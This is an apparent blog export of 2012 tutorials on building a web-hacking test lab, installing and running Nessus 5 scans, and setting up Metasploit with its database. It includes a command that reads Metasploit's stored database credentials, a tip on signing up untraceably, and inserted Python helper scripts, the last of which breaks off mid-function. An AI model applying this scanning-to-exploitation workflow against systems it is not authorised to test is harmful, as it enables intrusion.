<a href="http://i.imgur.com/E1Txj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/E1Txj.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You should be prompted about half way
through to enter a password for your new MySQL "root" user.
Make it something secure and take note of it for use later on. Once
entered it will continue running through the installation; go have a
smoke, grab a beer, whatever kills a few minutes for you.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2nUgN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/2nUgN.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Once it finishes we check to confirm it
was properly installed by using the mysql client (installed by
default in most cases and done by the above apt-get if not already).
We connect to the localhost database by using the built-in master
account, user name "root", paired up with the password we
created during the installation.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
If for some reason you were not
prompted for a password for the root user during installation then we
can use these commands to set one, as we don't want the MySQL root user with
no password (out of pure habit and prevention):
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>mysql -u root
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND-mysql> </b>SET PASSWORD
FOR 'root'@'localhost' = PASSWORD('yourpassword');
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>\q
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
The final syntax looks like this to
connect to the database going forward (once connected you can create
users|databases|tables|etc):
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo mysql -u root
-p'&lt;password&gt;'
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/nEMSw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/nEMSw.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>NOTE: </b>there is no space between
the “-p” and the quote-enclosed password; adding a space will cause problems, as
mysql then treats the password as the database name instead</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
If you want to be able to connect to
the MySQL instance from other machines on your network then you will
need to make a slight alteration to the MySQL configuration file.
Simply use your favorite text editor to edit the "/etc/mysql/my.cnf"
file to alter the "bind-address". It is set to 127.0.0.1 by
default and you need to change it to your network IP address if you
want it to listen so that other machines can then connect (i.e. change
127.0.0.1 to 192.168.1.20 or whatever IP you want to listen
on), save and exit.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/IIqmM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://i.imgur.com/IIqmM.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You now need to restart MySQL Service.
This is similar to Apache but since MySQL runs as a Service we use
the Service command, like so:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo service mysql
start|stop|restart
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/PZNBd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/PZNBd.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
You should now have a fully functional
setup to start your testing with. You can now build PHP applications
and pages with full database support. You can now install hacking
test frameworks like DVWA and have fun as you like. When you get
comfy, try installing entire CMS installs for full-out testing and bug
hunting. This wraps things up for our introduction to building a
basic test environment for web testing. I hope you have enjoyed this
write up as the first of many more to come.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Until next time, Enjoy!
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<u><b>ADDED TIP:</b></u></div>
<div style="margin-bottom: 0in;">
<span style="text-decoration: none;"><b>Enable
cURL support for PHP</b></span>
</div>
<div style="margin-bottom: 0in;">
In many cases you will want or need to
use curl to make certain connections and in PHP the libcurl library
allows us to get all the same functionality via PHP. Assuming you
want to install this or enable this after your setup follow these
quick steps:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo apt-get install
curl libcurl3 libcurl3-dev php5-curl
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dKhPr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/dKhPr.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Now we have curl enabled and installed
in all of its flavors (standalone and PHP) with all the necessary
underlying support it needs (thanks apt-get). In order for our system
to update and accept the changes we need to restart the apache server
one more time, like so:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo
/etc/init.d/apache2 restart
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Now you have cURL working, go have fun
with your new playground and the new ability to run and host all of
your favorite PHP web hacking scripts :)
</div>
<br /><b>HOW TO INSTALL NESSUS 5 on LINUX</b> (HR, 2012-07-03)
<br />
<div style="margin-bottom: 0in;">
OK, so recently I showed you how you
can effectively set up Metasploit, and today we will add one more item
to the arsenal to help make Metasploit even more useful and deadly. I
will show you how to install Nessus on your Linux box, although the
directions should not be too different for Windows, and when we are
done you will be able to install and configure your server as well as
customize your own vulnerability scans and be well on your way to
incorporating things fully into Metasploit for ultimate pwnage.
Before we begin you need to download the Nessus Scanner; version 5,
just recently released, is the latest and greatest. You then need to
register for a HOME FEED, which will get you a product code sent to
your chosen email for activation later (the link is near the top of the download
page in the yellow bar).
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You can find the download here:
<a href="http://www.tenable.com/products/nessus/select-your-operating-system">http://www.tenable.com/products/nessus/select-your-operating-system</a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
OK, move this to your desired location
to work with and we will get started by de-packaging the download
file. We do this using the “dpkg” command with the “-i”
argument to tell it to install the file content as needed.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo dpkg -i
Nessus-5.0.0-filename.deb</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/rnCl4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/rnCl4.jpg" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
The system will do the required
installation tasks for the most part; simply answer accordingly if
any prompts come up. Once completed the Nessus server will be started and
we can navigate to the login page in our browser of choice; you can
find it at either <a href="http://localhost:8834/">http://localhost:8834</a>
OR <a href="http://bt:8834/">http://bt:8834</a>. You will probably
need to accept a security warning since the certificate is self
signed...</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/DlknU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/DlknU.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
Once accepted you get the welcome page,
the first sign we are on our way.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/8l3uL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/8l3uL.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
Now go through the necessary steps to
create a new user account for Nessus, and take note or write it down
– whatever you do to remember your logins.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Pr11K.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/Pr11K.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
Download the plugins and wait for it to finish
initializing (it finishes configuration and restarts the server).
Once it's done you will need to log in with the new account you just
created.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/fOV5N.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/fOV5N.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
Once logged in you will see the Nessus
web panel from which all the magic happens (for the most part),
should look like this:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RhuJJ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/RhuJJ.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
In order to get started we need to go
to the Policies tab. You will see the default Policies which are
already set up and ready to go. You can view them for reference and
use as you like, but eventually you will want to customize your own
scan settings. In order to do this we need to hit the +ADD button in
the upper right.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YkV9i.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/YkV9i.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
Now we can configure our own scan with
all the settings we want as we like. The first tab is the General
settings which affect how the tool funcitons. You can define how to
handle congestion, what ports to scan, what type of scan method to
use, etc. Also, we give our Policy a name so we can identify it later
for use.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WnAiX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/WnAiX.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
Next we add any credentials we might
have on the Credentials tab. This step is optional but is suggested
if you have them as it will allow the scans to run much deeper and
with greater access. The results between a blank scan and a
credentialed scan can often times be alarming. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/18Xyf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/18Xyf.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
The next tab allow syou to define which
modules you actually want to use during the scan. Typically you will
simply use them all but in delicate situations this is where you can
go to fine tune things as needed. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Ccgdi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/Ccgdi.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
The last tab is the Preferences tab. It covers a lot of items, like adding
additional credentials, fine tuning scan settings, and other miscellaneous
things (check it out to see what all is available to you). The more you put
in, the more you will get back, as it allows for more in-depth scans to be
performed.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/J9c5G.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/J9c5G.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
When you're done simply hit the SUBMIT
button in the lower right hand corner of the last tab (Preferences).
Now we have a scan policy we can use anytime going forward, but how
do we use it? In order to use it we need to now go to the SCAN tab to
setup our actual scan to run. You will need to give your scan a name
which will be used for the reports as well, also identify the IP
address to scan. The IP can be provided as a single IP, and range or
in CIDR format. You can also choose to use a file with one IP per
line which will be used to scan through – very helpful in large
environments. The policy type from the drop down will be what defines
how the scan is performed, and is what we setup a minute ago :) When
you have it setup how you like simply hit the LAUNCH SCAN button in
lower right to start the scan process.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/tW16B.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/tW16B.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
You can go to the REPORT tab now to
view your running scans as well as all the completed ones. You can
click on the BROWSE button up right or double-click to open any
report up to view the results of the scan. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/1Uizy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/1Uizy.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
The reports in the new v5 are really
impressive visually and make for very good reports to hand over to
others if needed following a job (use HTML output option). </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/d0TmT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/d0TmT.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
The whole framework is very user
friendly, you can double-click anywhere on the report to drill down
for more information. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dfgir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/dfgir.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
You can drill all the way down and see
the identified vulnerability, the CVE reference number, as well as a
general description of the vulnerability in most cases and possible
remediation paths to follow. In some cases you may even be lucky
enough to get a link to additional reference material. Now when we
are done we probably want to export a copy of the scans for safe
keeping, reference, and to use with other tools (especially
Metasploit). Nessus supports several file formats for the output
file. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/slygz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/slygz.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
The HTML report provides you with
everything needed to present the findings to both technical and
non-technical parties. It has pretty graphics which get lots of “oos
and ahs”. The .NBE and .NESSUS formats are probably the most useful
as they can both be imported into Metasploit's database for further
use, mainly CVE references to match to known exploits. Play around
with them and find what suits you best, I tend to export my results
in multiple formats so I have options depending on the need.
</div>
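<div style="margin-bottom: 0in;">
As an added example (not from the original post or from Tenable), here is a small Python script that reads a .NESSUS export (the NessusClientData_v2 XML format) and pulls out what you want from it before handing findings to another tool: host, port, severity and the CVE references attached to each finding. The sample file, hosts, plugin IDs and CVE numbers are constructed placeholders, not real scan data.</div>

```python
# Added example: parse a Nessus v2 export (.nessus XML) into a triage list.
# Not code from the original post or from Nessus itself.
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample: a trimmed .nessus (NessusClientData_v2) file with two hosts.
# Hosts, plugin IDs and CVE ids are made-up placeholders, not real scan data.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.0.2.10">
      <HostProperties>
        <tag name="host-ip">192.0.2.10</tag>
        <tag name="operating-system">Example OS</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="100001" pluginName="Example SMB service flaw" pluginFamily="Windows">
        <risk_factor>Critical</risk_factor>
        <cve>CVE-0000-0001</cve>
        <cve>CVE-0000-0002</cve>
        <solution>Apply the vendor patch.</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="100002" pluginName="Host information" pluginFamily="General">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.0.2.11">
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
                  pluginID="100003" pluginName="Example web server issue" pluginFamily="Web Servers">
        <risk_factor>Medium</risk_factor>
        <cve>CVE-0000-0003</cve>
        <solution>Upgrade the web server.</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Nessus severity scale: 0 = informational, 4 = critical (critical appeared in v5).
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}


def parse_nessus(xml_text):
    """Return one dict per ReportItem, most severe first, skipping informational output."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        host_ip = host.get("name")
        # Prefer the host-ip property when present; fall back to the ReportHost name.
        for tag in host.iter("tag"):
            if tag.get("name") == "host-ip" and tag.text:
                host_ip = tag.text.strip()
        for item in host.findall("ReportItem"):
            severity = int(item.get("severity", "0"))
            if severity == 0:
                continue  # informational plugin output, not a vulnerability
            findings.append({
                "host": host_ip,
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "plugin_id": item.get("pluginID", ""),
                "name": item.get("pluginName", ""),
                "severity": severity,
                "severity_name": SEVERITY_NAMES.get(severity, str(severity)),
                "cves": sorted(c.text.strip() for c in item.findall("cve") if c.text),
                "solution": (item.findtext("solution") or "").strip(),
            })
    # Most severe first, then by host and port, so the list reads like a work queue.
    findings.sort(key=lambda f: (-f["severity"], f["host"], f["port"]))
    return findings


def cves_by_host(findings):
    """Map each host to the sorted list of CVE ids Nessus attached to its findings."""
    out = defaultdict(set)
    for f in findings:
        out[f["host"]].update(f["cves"])
    return {h: sorted(c) for h, c in out.items()}


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS)
    for f in found:
        print(f"{f['severity_name']:8} {f['host']}:{f['port']}/{f['protocol']}  "
              f"{f['name']}  {','.join(f['cves']) or '-'}")
    print(cves_by_host(found))
```

<div style="margin-bottom: 0in;">
Point parse_nessus at the contents of a real export and you get the same per-host CVE list the Metasploit import builds from it, which is handy for a quick sanity check before and after importing.</div>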
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
All in all I rate this new release an A++ in my book. This concludes our
basic introduction to the Nessus vulnerability scanner. You should now be
able to set it up properly on your system and customize your own scans to run
on targets. I will have a follow-up series coming shortly on how we can
import into Metasploit to take things to the next level, as well as how to
run scans directly from Metasploit once our policies have been defined.</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<u><b>QUICK FINAL NOTE: </b></u>The Nessus server will start up on system
startup. If you wish to start, stop, or restart the Nessus server at any time,
just use this command syntax and select your option accordingly.</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo /etc/init.d/nessusd start|stop|restart</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
</div>
<div style="margin-bottom: 0in;">
I
hope you have enjoyed this tutorial and until next time, Enjoy!</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br /></div>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-78485140269636124232012-07-03T10:17:00.000-05:002012-07-03T10:18:30.989-05:00HOW TO INSTALL METASPLOIT (on Ubuntu 11.10)
<br />
<div align="LEFT" style="margin-bottom: 0in;">
Today I will provide you
with a quick tutorial on how you can install Metasploit on your
Linux box so you don't have to waste time with Backtrack. Once we are
done you should have a working instance of Metasploit installed as a
service and a working PostgreSQL database to connect giving you the
full availability of all that Metasploit has to offer us. In order to
begin we first need to download the latest installer package for our
system from the main Metasploit site.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Download available here:
<a href="http://www.metasploit.com/download/">http://www.metasploit.com/download/</a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
OK, so before we run our installer we need to first give it executable
rights; we do this through the “chmod” command. We simply issue the following
command, which turns the file into an executable:</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND:</b> chmod +x
metasploit-latest-installer-file.run</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Once this is done we can simply execute it from the console to launch the
installer.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/QrERN.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/QrERN.jpg" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
You will need to answer a
few simple setup questions for the installer to do its thing, I
suggest allowing it to install as a Service and leaving the default
port unless you have reason to move elsewhere.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Once it is done you will need to navigate in your browser to the login page
for the new Web GUI interface. You can find it at: <a href="https://localhost:3790/">https://localhost:3790/</a>
unless you changed the default port during setup.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Fi1Ct.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/Fi1Ct.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Once the exception is made you will be redirected to the Web GUI login page,
where you can create a new user account to use with the GUI.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/IPicN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/IPicN.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
When you click on Create Account it will ask for a product code. Click on the
hyperlink above it to request one. You can use <a href="http://www.guerrillamail.com/">http://www.guerrillamail.com/</a>
for a temporary email for signup if you don't want to leave any traces, or
you're just plain bonkers paranoid. They will email you a temp product code
which you then need to load to get the real product code, so you need a
working email (which is why I like GuerrillaMail).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/gfrfS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/gfrfS.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Enter temp code to get real
code:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/N1br1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/N1br1.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Now activate your shit:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mF1fI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/mF1fI.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Yeah, now we're legit and have the Web GUI installed.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/kyfWI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/kyfWI.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Use the administrator panel to update the software so you have all of the
latest and greatest available to use.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/OdVBH.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/OdVBH.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
Once you are updated you can
start cooking with the Web GUI if you like. You can create a Project
to get started, just give it a name and a few details:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RvQ8P.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/RvQ8P.png" width="400" /></a></div>
<br />
<div align="LEFT" style="margin-bottom: 0in;">
Once the project is created you can define all the scan options and do what
you want. This community edition is fairly limited in what it is capable of
doing, so mostly just the Discovery tab will be working in full.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/jX6OJ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/jX6OJ.png" width="400" /></a></div>
<br />
<div align="LEFT" style="margin-bottom: 0in;">
You can use a work email to get a product code to try the PRO version for a
1 week trial period if you like. It is basically just point-and-click hacking
though, aimed at administrators from companies with money and little
knowledge of how to operate the underlying framework. Since I know we are all
poor, let us now go set things up so we can use the more traditional
MSFCONSOLE, which doesn't have any limitations for us once properly set up.
We start by dropping back to the console or terminal and navigating to our
MSF installation directory “/opt/metasploit-4.x/msf3”.</div>
<div align="LEFT" style="margin-bottom: 0in;">
<b><br /></b>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND:</b> cd
/opt/metasploit-4.x/msf3/</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Now we update things real quick once more to make sure our console is fully
up to date in addition to the stupid worthless WebGUI. We do this using the
built-in MSFUPDATE function. Simply run it from the command line with sudo
privileges and wait a few minutes for it to do its thing.</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND</b>: sudo msfupdate</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/uzdjB.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/uzdjB.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Now we start the msfconsole
using simple command “sudo msfconsole”</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/9xEzc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="http://i.imgur.com/9xEzc.png" width="320" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Now that we are updated we can make sure the database functionality from the
bundled PostgreSQL is properly working. This is probably where almost everyone
fails when setting things up. The system comes pre-bundled with everything
needed, but poor documentation makes it hard to figure things out sometimes,
mainly how to connect to the dang database. Well, today I lift the mystery :)</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
The database credentials created upon installation are stored in a file in
the /config directory within the MSF installation folder. We can use the
“cat” command to read the file contents to ensure we are using the proper
credentials to connect.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo cat /opt/metasploit-4.1.4/config/database.yml</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/HacUM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://i.imgur.com/HacUM.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
Now we can use those
credentials to connect to the Metasploit database created at startup
without any need to create new users, databases, or anything else :)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Gm2HN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://i.imgur.com/Gm2HN.png" width="400" /></a></div>
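<div align="LEFT" style="margin-bottom: 0in;">
As an added example (not from the post and not Metasploit's own code), here is a small Python script that reads a database.yml in the shape the installer writes, composes the db_connect line that msfconsole takes, and reports whether the file, which holds the PostgreSQL password in clear text, is readable by other users on the box. The file contents are constructed (the password is a placeholder), and the parser only handles the flat layout shown; it is not a full YAML parser.</div>

```python
# Added example: turn the bundled database.yml into a db_connect line and
# check who else can read it. Not code from the original post or from Metasploit.
import os
import stat
import tempfile

# Constructed sample in the shape of the installer's database.yml (values made up;
# YAML anchors the real file may contain are left out so a tiny parser suffices).
SAMPLE_DATABASE_YML = """\
# generated by the installer (constructed sample)
production:
  adapter: postgresql
  database: msf3
  username: msf3
  password: s3cr3t-placeholder
  host: localhost
  port: 7175
  pool: 75
  timeout: 5
"""


def parse_simple_yml(text):
    """Minimal parser for the flat 'env:' / '  key: value' layout above (not full YAML)."""
    data, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue                                  # blank line or comment
        if not line.startswith(" "):                  # top-level environment name
            current = line.rstrip(":").strip()
            data[current] = {}
        elif current is not None and ":" in line:     # indented key: value pair
            key, value = line.strip().split(":", 1)
            data[current][key.strip()] = value.strip()
    return data


def db_connect_line(cfg, env="production"):
    """Compose msfconsole's 'db_connect user:pass@host:port/database' from the parsed file."""
    e = cfg[env]
    return "db_connect {username}:{password}@{host}:{port}/{database}".format(**e)


def permission_problems(path):
    """List the ways other users could read the credentials file at path."""
    mode = os.stat(path).st_mode
    problems = []
    if mode & stat.S_IRGRP:
        problems.append("group-readable")
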